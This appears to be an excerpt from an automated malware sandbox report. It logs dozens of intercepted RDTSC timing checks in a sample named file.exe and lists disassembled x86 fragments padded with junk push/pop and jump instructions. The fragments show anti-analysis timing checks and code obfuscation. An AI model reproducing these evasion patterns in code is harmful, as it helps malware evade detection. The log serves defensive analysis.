Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCFF28 second address: CCF7AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F8C99233266h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007F8C99233274h 0x00000016 push dword ptr [ebp+122D1721h] 0x0000001c pushad 0x0000001d jnl 00007F8C9923326Ch 0x00000023 adc ecx, 0496332Bh 0x00000029 popad 0x0000002a call dword ptr [ebp+122D2F1Dh] 0x00000030 pushad 0x00000031 jmp 00007F8C9923326Ah 0x00000036 xor eax, eax 0x00000038 jmp 00007F8C99233271h 0x0000003d mov edx, dword ptr [esp+28h] 0x00000041 jmp 00007F8C9923326Fh 0x00000046 mov dword ptr [ebp+122D281Ch], eax 0x0000004c jns 00007F8C99233279h 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D2FE7h], edi 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 je 00007F8C9923327Ch 0x00000067 jmp 00007F8C99233276h 0x0000006c lodsw 0x0000006e jmp 00007F8C99233271h 0x00000073 mov dword ptr [ebp+122D2FE7h], ebx 0x00000079 add eax, dword ptr [esp+24h] 0x0000007d add dword ptr [ebp+122D2BA2h], esi 0x00000083 mov ebx, dword ptr [esp+24h] 0x00000087 cld 0x00000088 jnl 00007F8C9923327Bh 0x0000008e push eax 0x0000008f push eax 0x00000090 push edx 0x00000091 push eax 0x00000092 push edx 0x00000093 jo 00007F8C99233266h 0x00000099 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCF7AB second address: CCF7B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E4DAEA second address: E4DAF4 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C99233266h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E4DAF4 second address: E4DB03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F8C98BA52C9h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E4E1F7 second address: E4E1FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E50DF5 second address: CCF7AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8C98BA52C4h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F8C98BA52C8h 0x00000018 mov eax, dword ptr [eax] 0x0000001a push edx 0x0000001b jnc 00007F8C98BA52B8h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 jnc 00007F8C98BA52BEh 0x0000002c pop eax 0x0000002d jnc 00007F8C98BA52BCh 0x00000033 push dword ptr [ebp+122D1721h] 0x00000039 call dword ptr [ebp+122D2F1Dh] 0x0000003f pushad 0x00000040 jmp 00007F8C98BA52BAh 0x00000045 xor eax, eax 0x00000047 jmp 00007F8C98BA52C1h 0x0000004c mov edx, dword ptr [esp+28h] 0x00000050 jmp 00007F8C98BA52BFh 0x00000055 mov dword ptr [ebp+122D281Ch], eax 0x0000005b jns 00007F8C98BA52C9h 0x00000061 mov esi, 0000003Ch 0x00000066 mov dword ptr [ebp+122D2FE7h], edi 0x0000006c add esi, dword ptr [esp+24h] 0x00000070 je 00007F8C98BA52CCh 0x00000076 jmp 00007F8C98BA52C6h 0x0000007b lodsw 0x0000007d jmp 00007F8C98BA52C1h 0x00000082 mov dword ptr [ebp+122D2FE7h], ebx 0x00000088 add eax, dword ptr [esp+24h] 0x0000008c add dword ptr [ebp+122D2BA2h], esi 0x00000092 mov ebx, dword ptr [esp+24h] 0x00000096 cld 0x00000097 jnl 00007F8C98BA52CBh 0x0000009d push eax 0x0000009e push eax 0x0000009f push edx 0x000000a0 push eax 0x000000a1 push edx 0x000000a2 jo 00007F8C98BA52B6h 0x000000a8 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E50F02 second address: E50F50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C99233270h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8C99233276h 0x0000000f pop eax 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007F8C9923326Dh 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e ja 00007F8C9923326Ch 0x00000024 jno 00007F8C99233266h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E50F50 second address: E50F91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F8C98BA52B6h 0x00000009 jmp 00007F8C98BA52BAh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 je 00007F8C98BA52CEh 0x0000001c jmp 00007F8C98BA52C8h 0x00000021 push eax 0x00000022 push edx 0x00000023 jo 00007F8C98BA52B6h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E51062 second address: E51066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5119D second address: E511A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E511A1 second address: E511E5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F8C99233273h 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 jg 00007F8C99233268h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F8C99233279h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E511E5 second address: E511E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E511E9 second address: E51230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jng 00007F8C99233272h 0x00000011 jns 00007F8C9923326Ch 0x00000017 pop eax 0x00000018 jne 00007F8C9923326Ah 0x0000001e xor edx, dword ptr [ebp+122D28C0h] 0x00000024 lea ebx, dword ptr [ebp+12454D6Ah] 0x0000002a push ecx 0x0000002b jns 00007F8C9923326Ch 0x00000031 pop edi 0x00000032 push eax 0x00000033 pushad 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E512BB second address: E51320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8C98BA52B6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jc 00007F8C98BA52BEh 0x00000013 jnc 00007F8C98BA52B8h 0x00000019 nop 0x0000001a movsx edx, di 0x0000001d push 00000000h 0x0000001f mov dword ptr [ebp+122D2D8Fh], eax 0x00000025 call 00007F8C98BA52B9h 0x0000002a jmp 00007F8C98BA52C8h 0x0000002f push eax 0x00000030 jmp 00007F8C98BA52C2h 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 pushad 0x0000003a pushad 0x0000003b push ebx 0x0000003c pop ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E51320 second address: E51355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F8C99233271h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jp 00007F8C99233266h 0x0000001f popad 0x00000020 pushad 0x00000021 jc 00007F8C99233266h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E51355 second address: E513A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 mov edi, 484B6247h 0x0000000c push 00000003h 0x0000000e xor dword ptr [ebp+122D2D6Dh], ebx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F8C98BA52B8h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 push 00000003h 0x00000032 mov edi, dword ptr [ebp+122D2B34h] 0x00000038 call 00007F8C98BA52B9h 0x0000003d push esi 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E513A2 second address: E513F4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8C99233266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push ecx 0x0000000d push ebx 0x0000000e jmp 00007F8C99233274h 0x00000013 pop ebx 0x00000014 pop ecx 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jnl 00007F8C9923327Fh 0x0000001f mov eax, dword ptr [eax] 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 je 00007F8C99233266h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E513F4 second address: E51426 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8C98BA52B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 jg 00007F8C98BA52BCh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8C98BA52C4h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E51426 second address: E51446 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+122D2A24h] 0x0000000e lea ebx, dword ptr [ebp+12454D75h] 0x00000014 mov ch, bl 0x00000016 xchg eax, ebx 0x00000017 jc 00007F8C9923326Eh 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E61E56 second address: E61E5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E61E5B second address: E61E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6EAD9 second address: E6EAE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6EC39 second address: E6EC47 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6EC47 second address: E6EC8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52C7h 0x00000007 jmp 00007F8C98BA52C6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e js 00007F8C98BA52C2h 0x00000014 jns 00007F8C98BA52B6h 0x0000001a ja 00007F8C98BA52B6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6EDBB second address: E6EDD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C99233276h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6EDD5 second address: E6EDDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6F221 second address: E6F226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6F226 second address: E6F246 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8C98BA52BAh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F8C98BA52BFh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6F77E second address: E6F796 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C9923326Eh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6FBD7 second address: E6FBDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E6FBDE second address: E6FBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E70227 second address: E70242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F8C98BA52BCh 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7050A second address: E70512 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7081E second address: E70822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E37D7E second address: E37DA8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F8C99233279h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a jmp 00007F8C9923326Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E74976 second address: E7497A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7497A second address: E7498B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C9923326Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E74FBB second address: E74FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F8C98BA52B8h 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E74FCB second address: E74FF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push ebx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F8C99233273h 0x00000017 popad 0x00000018 pop ebx 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E74FF8 second address: E7502E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C98BA52BAh 0x00000009 popad 0x0000000a push edi 0x0000000b jmp 00007F8C98BA52BAh 0x00000010 pop edi 0x00000011 popad 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F8C98BA52C3h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E397CD second address: E397D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E397D3 second address: E397DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8C98BA52B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7D7D8 second address: E7D7DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7D7DD second address: E7D7E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E7D7E3 second address: E7D7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E80045 second address: E8006C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8C98BA52BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F8C98BA52C1h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E80127 second address: E80144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C9923326Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8C9923326Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E80144 second address: E8017E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8C98BA52B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 13BE7984h 0x00000012 jmp 00007F8C98BA52C5h 0x00000017 push CADD2A9Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e jbe 00007F8C98BA52BCh 0x00000024 jno 00007F8C98BA52B6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8017E second address: E80199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C99233276h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8031B second address: E8031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8046B second address: E80471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E80471 second address: E80475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E80576 second address: E8057A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8057A second address: E8057E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8121C second address: E81220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E81220 second address: E81226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E81226 second address: E8122C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8122C second address: E81230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E81230 second address: E8123F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E83FD2 second address: E83FDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F8C98BA52B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E85E6C second address: E85EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 jnl 00007F8C9923327Fh 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F8C99233268h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 or di, 2C00h 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jno 00007F8C99233268h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E87325 second address: E8733D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E87DD6 second address: E87DDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E87DDA second address: E87DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8B623 second address: E8B62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8C99233266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8B62D second address: E8B631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8B631 second address: E8B64B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jc 00007F8C9923326Ch 0x00000010 jne 00007F8C99233266h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8D613 second address: E8D618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8E469 second address: E8E470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E904EF second address: E9053F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jl 00007F8C98BA52B6h 0x00000011 pop esi 0x00000012 pop edx 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F8C98BA52B8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov ebx, dword ptr [ebp+122D333Ch] 0x00000034 push 00000000h 0x00000036 mov ebx, 30B2599Eh 0x0000003b push 00000000h 0x0000003d mov edi, esi 0x0000003f mov ebx, dword ptr [ebp+12454E72h] 0x00000045 xchg eax, esi 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8A8C3 second address: E8A8C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E9053F second address: E9054E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8D739 second address: E8D740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8E6B5 second address: E8E6CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C98BA52BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E89971 second address: E89988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C9923326Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E8C8D3 second address: E8C8E5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8C98BA52B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F8C98BA52B6h 0x00000012 rdtsc
